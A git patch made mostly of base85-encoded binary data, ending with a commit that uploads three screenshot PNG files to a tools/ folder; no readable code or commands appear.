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 G|M5Q#Xe46* From 0e0ae15c440719137d3780a515537409dd7badae Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Mar 2019 20:36:55 +0100 Subject: [PATCH 036/214] Add files via upload --- tools/screenshot1.png | Bin 0 -> 46770 bytes tools/screenshot2.png | Bin 0 -> 93638 bytes tools/screenshot3.png | Bin 0 -> 100649 bytes 3 files changed, 0 insertions(+), 0 deletions(-) create mode 100644 tools/screenshot1.png create mode 100644 tools/screenshot2.png create mode 100644 tools/screenshot3.png diff --git a/tools/screenshot1.png b/tools/screenshot1.png new file mode 100644 index 0000000000000000000000000000000000000000..e24d0144581f19d0f0df68c4a18487acb1a2b165 GIT binary patch literal 46770 zcmb@uby$^a_brSC27&^Dv?79ZN=O-WD&5`PEvSezNJxj0(k0!}Euo}zcXyom=-$8c zzTf$-^VeCITZy%vbwBq#=a^%RIoI}iDJgXGI>B`m6qK7H!u--GC|BfBP%fcdMTMVq z^KyTOe=gfR7m>XR57(=@-taxXt$?DfjD^0fgO;@(ih;R>nI4^ujK3!kCsqDAGzEAK7wfrTGvtj=eZrT>+1;yc8^Vd z(RMF|PzGUTlKu18;#aD4w8|NnTwRS@wrdHMkh$PJ^Myhp+Hzy!+1hAX{qG8g&Lf-o zE@BKKj;GU20oz=z|Gdc|+V;lAL|TGdqU~ZYF4g*a&ADXwB~JIVN`bac8qqA@nJ)r< zxUVwh>CjOsYUQ?dV`K3( zXGeZYh5ENiNxQvoKUnBb$F{e(C*pAq$?Y5Q#)zs)W%{!NUhafivw4H67MUViEKy z8Z~Z<7*8r(_UQ$af=S&^f?p*G&a&>PeoDHXiR$roVnXx#_wSF?D@#+fnK>;dP)?6_ 